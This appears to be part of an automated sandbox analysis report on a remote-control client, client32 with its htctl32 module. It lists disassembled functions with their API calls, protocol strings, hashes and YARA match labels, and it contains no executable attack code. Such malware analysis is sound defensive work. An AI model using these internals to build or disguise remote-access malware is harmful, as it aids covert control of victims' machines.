                                                                                                                                        • API String ID: 275297366-914382535
                                                                                                                                        • Opcode ID: e98d0bded65378428955a9b04f5d35164d6251877c2f1cf9535bcf85ad73d039
                                                                                                                                        • Instruction ID: 602d90e521dd9c30f4aeae500c12a8585eec0fb6fe41cee3dfe68a792c27b45b
                                                                                                                                        • Opcode Fuzzy Hash: e98d0bded65378428955a9b04f5d35164d6251877c2f1cf9535bcf85ad73d039
                                                                                                                                        • Instruction Fuzzy Hash: C8C175B5D04269AFDF20DFE89C41AFEB7B4AF15308F80057ED51AE6200E7359A48CB52
                                                                                                                                        Function 688FA000 Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 197COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688FA057
                                                                                                                                          • Part of subcall function 689149AE: strtoxl.LIBCMT ref: 689149D0
                                                                                                                                        • ctl_getsession.HTCTL32(?), ref: 688FA09B
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?), ref: 688FA0BA
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688FA0EB
                                                                                                                                        • _strncat.LIBCMT ref: 688FA132
                                                                                                                                        • _free.LIBCMT ref: 688FA22F
                                                                                                                                        • _free.LIBCMT ref: 688FA238
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection_free$EnterLeave__wcstoui64_strncatctl_getsessionstrtoxl
                                                                                                                                        • String ID: 305090$CLIENT_NAME=%s$CMD=CONNECT_REPLY$CONNECTION_ID$CONNECTION_ID=%u$CONTROL_ADDR$CONTROL_NAME$NC_$RESULT=%d
                                                                                                                                        • API String ID: 1400833098-100571553
                                                                                                                                        • Opcode ID: d1f00e011837c8e481256ab3ced6f69a862a9de0a2d4243254c2a85d68bba493
                                                                                                                                        • Instruction ID: d5914987396e5cfc32c0599530a0c238a0cde10343390126a99039b40c877798
                                                                                                                                        • Opcode Fuzzy Hash: d1f00e011837c8e481256ab3ced6f69a862a9de0a2d4243254c2a85d68bba493
                                                                                                                                        • Instruction Fuzzy Hash: DA717EB5D04218AFDB10DFE8DC80BAEBBF8AF59358F94842DE415E7200E7749505CBA5
                                                                                                                                        Function 689017B9 Relevance: 26.6, APIs: 4, Strings: 11, Instructions: 356COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • _memset.LIBCMT ref: 68901816
                                                                                                                                        • __wcstoui64.LIBCMT ref: 68901B14
                                                                                                                                          • Part of subcall function 689149AE: strtoxl.LIBCMT ref: 689149D0
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901C12
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 68901C62
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901C95
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 68901CAC
                                                                                                                                        • std::exception::exception.LIBCMT ref: 68901CDA
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 68901CF5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave_memset$Exception@8Throw__wcstoui64_mallocstd::exception::exceptionstrtoxlwsprintf
                                                                                                                                        • String ID: CAP$ENC$END_REC$FLG$MORE$RESULT$TIM$TMG$TXT$UID$b
                                                                                                                                        • API String ID: 29704495-3942920506
                                                                                                                                        • Opcode ID: ffb1e0a4f500c11d9bbecb0acc472e7ff429a49ae830fb8a686b6a2430f91843
                                                                                                                                        • Instruction ID: 5958403a292c7da9e90e1d0e13ddcf0cfdc03037f5d7f9d842c49a6f6b604359
                                                                                                                                        • Opcode Fuzzy Hash: ffb1e0a4f500c11d9bbecb0acc472e7ff429a49ae830fb8a686b6a2430f91843
                                                                                                                                        • Instruction Fuzzy Hash: F2C197B5D042296FDF20DFA89C41ABF76B89F2520CF84017ED516E6201F731CB99CA96
                                                                                                                                        Function 689046E0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 171sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 68904762
                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 6890477B
                                                                                                                                        • _free.LIBCMT ref: 68904810
                                                                                                                                        • GetTickCount.KERNEL32 ref: 6890481E
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68904830
                                                                                                                                        • Sleep.KERNEL32(00000014), ref: 6890483E
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 68904852
                                                                                                                                        • _free.LIBCMT ref: 6890487E
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 68904898
                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 689048B4
                                                                                                                                        • SetLastError.KERNEL32(00000057), ref: 689048C4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$CountEnterErrorLastLeaveTick_free$Sleep
                                                                                                                                        • String ID: APPTYPE=%d$CMD=LICENSEINFO$GSK=%s$Gateway_Gsk
                                                                                                                                        • API String ID: 1027280825-3838607062
                                                                                                                                        • Opcode ID: 8407279ea64c65b3e42e31062875a5dbd76129e0138a4793897f92a9d40b9310
                                                                                                                                        • Instruction ID: 1049e8ee8e25fd6728b914aa01fab09d742a76a198422ea10c2f78bbb7da74e2
                                                                                                                                        • Opcode Fuzzy Hash: 8407279ea64c65b3e42e31062875a5dbd76129e0138a4793897f92a9d40b9310
                                                                                                                                        • Instruction Fuzzy Hash: DB51B076944219AFDB20DFA8CC45FAF77B8EF95348F804918E94597240EB31E905CBA1
                                                                                                                                        Function 688FFC60 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$Xinvalid_argumentstd::_
                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                        • API String ID: 1771113911-4289949731
                                                                                                                                        • Opcode ID: b8feaf20e23ccf89f4431d1a2b735e7e5b61d951459d6b995b62dadb511fba2e
                                                                                                                                        • Instruction ID: c73f9094dd5c4c89b122d99cefd1aa50b73eade2501b6d4cff9a7a611e0538c3
                                                                                                                                        • Opcode Fuzzy Hash: b8feaf20e23ccf89f4431d1a2b735e7e5b61d951459d6b995b62dadb511fba2e
                                                                                                                                        • Instruction Fuzzy Hash: B8B18F717140489BDB28CF1CDC90A5E73A6EFA57847944D28F892CB781CBB4E852CBA1
                                                                                                                                        Function 11121100 Relevance: 24.8, APIs: 4, Strings: 10, Instructions: 270threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InitializeCriticalSection.KERNEL32(0000001C), ref: 1112117E
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 111211B5
                                                                                                                                        • GlobalAddAtomA.KERNEL32(NSMRemote32), ref: 111213AA
                                                                                                                                        • GetVersionExA.KERNEL32(?,?,?,00000000), ref: 111213D3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AtomCriticalCurrentGlobalInitializeSectionThreadVersion
                                                                                                                                        • String ID: IgnoreScrape$LegacyScrape$LimitColorbits$MaxLag$NSMRemote32$ScaleToFitMode$ScaleToFitTilingFactor$Show$ShowBigBlits$View
                                                                                                                                        • API String ID: 3042533059-2538903574
                                                                                                                                        • Opcode ID: fbf171a93a064c4978fa1075158420c735f9f0bd711a0402550495a255e203ec
                                                                                                                                        • Instruction ID: eb6122d518b0ca6329e0510ddbb3154fc8dc97cf8e450e1036336aff3cebea76
                                                                                                                                        • Opcode Fuzzy Hash: fbf171a93a064c4978fa1075158420c735f9f0bd711a0402550495a255e203ec
                                                                                                                                        • Instruction Fuzzy Hash: 59B18CB8A00705AFD760CF65CD84B9BFBF5AF85704F20856EE55A9B280DB30A940CF51
                                                                                                                                        Function 68901F90 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 240networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • getpeername.WSOCK32(?,?,?,68930E3D,?,?,?,?), ref: 68902198
                                                                                                                                        • htons.WSOCK32(?,?,?,?,?,68930E3D,?,?,?,?), ref: 689021A9
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,?,?,68930E3D,?,?,?,?), ref: 689021D9
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?), ref: 6890220C
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,?,?,68930E3D,?,?,?,?), ref: 68902217
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?), ref: 68902227
                                                                                                                                        • std::exception::exception.LIBCMT ref: 6890226B
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 68902286
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave$Exception@8Throw_malloc_memsetgetpeernamehtonsstd::exception::exceptionwsprintf
                                                                                                                                        • String ID: FNAME$FSIZE$LINK$LWT$RESULT$SUB
                                                                                                                                        • API String ID: 205723298-3189277165
                                                                                                                                        • Opcode ID: cecfddbdfee6b08383c51979d207ea270d865fbb5ad089ec435542f3b29fa5ef
                                                                                                                                        • Instruction ID: e0f9499c001ac2996f44e57c08fbf15cf3e8ad531c3bd3104e133ba58193b235
                                                                                                                                        • Opcode Fuzzy Hash: cecfddbdfee6b08383c51979d207ea270d865fbb5ad089ec435542f3b29fa5ef
                                                                                                                                        • Instruction Fuzzy Hash: 9D9132B5D042699FDF60DFE8CC80AAEBBB4BF58308F90452ED55AE7200EB309945CB51
                                                                                                                                        Function 11103110 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 153COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 1110313E
                                                                                                                                        • EnterCriticalSection.KERNEL32(111EC5C4), ref: 11103147
                                                                                                                                        • GetTickCount.KERNEL32 ref: 1110314D
                                                                                                                                        • GetTickCount.KERNEL32 ref: 111031A0
                                                                                                                                        • LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031A9
                                                                                                                                        • GetTickCount.KERNEL32 ref: 111031DA
                                                                                                                                        • LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031E3
                                                                                                                                        • EnterCriticalSection.KERNEL32(111EC5C4), ref: 1110320C
                                                                                                                                        • LeaveCriticalSection.KERNEL32(111EC5C4,00000000,?,00000000), ref: 111032D3
                                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                          • Part of subcall function 110EEA50: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11103277,?), ref: 110EEA7B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_memsetwsprintf
                                                                                                                                        • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                                                                                        • API String ID: 3572004736-3013461081
                                                                                                                                        • Opcode ID: 2b14e68d4533465ca6ede4850a325a27a31b967f1298800cdcf78ff7dd429e77
                                                                                                                                        • Instruction ID: 751a9e08e7d07462896511fc241fa3711dcdedb17ea13ac702f7fc28ec4d2028
                                                                                                                                        • Opcode Fuzzy Hash: 2b14e68d4533465ca6ede4850a325a27a31b967f1298800cdcf78ff7dd429e77
                                                                                                                                        • Instruction Fuzzy Hash: 9441F67AF04519AFCB11DFE59C85EEEFBB5AB44218B104525F905E7640EB306900CBA1
                                                                                                                                        Function 68908140 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 147libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$Library$AddressFreeLoadProcwsprintf
                                                                                                                                        • String ID: RAS$%02x%02x%02x%02x%02x%02x$* $3$DEST$Netbios$netapi32.dll
                                                                                                                                        • API String ID: 3525900152-2950743334
                                                                                                                                        • Opcode ID: 6edca19c39be580455583414aecf30ff076608335fd994d16424bf1f3ef9b493
                                                                                                                                        • Instruction ID: ccca11da6246e7a2d996a93b55bec02b486401354b24670d976a8f33a1b444ab
                                                                                                                                        • Opcode Fuzzy Hash: 6edca19c39be580455583414aecf30ff076608335fd994d16424bf1f3ef9b493
                                                                                                                                        • Instruction Fuzzy Hash: 4251F770A582689BCB36CB688C55BAE7BFCAF5A305F4040D9E88CB7240D6758B84CF54
                                                                                                                                        Function 688F52B0 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 117filetimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F50E0: GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,nextfileindex,00000001,C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini), ref: 688F5131
                                                                                                                                          • Part of subcall function 688F50E0: wsprintfA.USER32 ref: 688F514A
                                                                                                                                          • Part of subcall function 688F50E0: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 688F5168
                                                                                                                                          • Part of subcall function 688F50E0: GetFileSize.KERNEL32(00000000,00000000), ref: 688F5172
                                                                                                                                          • Part of subcall function 688F50E0: GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,maxfilesize,000003E8,C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini), ref: 688F5191
                                                                                                                                          • Part of subcall function 688F50E0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 688F51B2
                                                                                                                                          • Part of subcall function 688F50E0: FlushFileBuffers.KERNEL32(00000000,?,688F9B16,00000001), ref: 688F51D8
                                                                                                                                          • Part of subcall function 688F50E0: CloseHandle.KERNEL32(00000000), ref: 688F51E4
                                                                                                                                          • Part of subcall function 688F50E0: wsprintfA.USER32 ref: 688F5225
                                                                                                                                          • Part of subcall function 688F50E0: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 688F5243
                                                                                                                                        • GetDateFormatA.KERNEL32(00000400,00000000,00000000,dd-MMM-yy,?,00000020,?,?,?), ref: 688F52E8
                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 688F52F2
                                                                                                                                        • wsprintfA.USER32 ref: 688F5315
                                                                                                                                        • _memset.LIBCMT ref: 688F5329
                                                                                                                                        • wsprintfA.USER32 ref: 688F5366
                                                                                                                                        • _memmove.LIBCMT ref: 688F537B
                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 688F53CE
                                                                                                                                        • GetLastError.KERNEL32 ref: 688F53F5
                                                                                                                                        Strings
                                                                                                                                        • !>>, xrefs: 688F5380
                                                                                                                                        • --------------------------------------------------------------------[#%u] %hs %hs %s Length: %d (%s)<<!, xrefs: 688F5360
                                                                                                                                        • TraceBuf - WriteFile failed (%d), xrefs: 688F53FC
                                                                                                                                        • OUT, xrefs: 688F5335, 688F5348
                                                                                                                                        • dd-MMM-yy, xrefs: 688F52DA
                                                                                                                                        • %02d:%02d:%02d.%03d, xrefs: 688F530F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$wsprintf$CreatePrivateProfile$BuffersCloseDateErrorFlushFormatHandleLastLocalPointerSizeTimeWrite_memmove_memset
                                                                                                                                        • String ID: !>>$%02d:%02d:%02d.%03d$--------------------------------------------------------------------[#%u] %hs %hs %s Length: %d (%s)<<!$OUT$TraceBuf - WriteFile failed (%d)$dd-MMM-yy
                                                                                                                                        • API String ID: 379988029-3025963029
                                                                                                                                        • Opcode ID: c02771e2ed7f2e6d56c6234c663590ab70d8a6b3c99c1451d5fcb021f0d57cf4
                                                                                                                                        • Instruction ID: a4660ac14a4ce7777151788d36f03b3d6c827cadc4ec824423ee124cbc3aec90
                                                                                                                                        • Opcode Fuzzy Hash: c02771e2ed7f2e6d56c6234c663590ab70d8a6b3c99c1451d5fcb021f0d57cf4
                                                                                                                                        • Instruction Fuzzy Hash: A641A272A04318AFDB24DF95DC45FFE77B8EB8A704F408159F909A7240E770AA04CBA1
                                                                                                                                        Function 68918572 Relevance: 24.1, APIs: 16, Instructions: 95COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
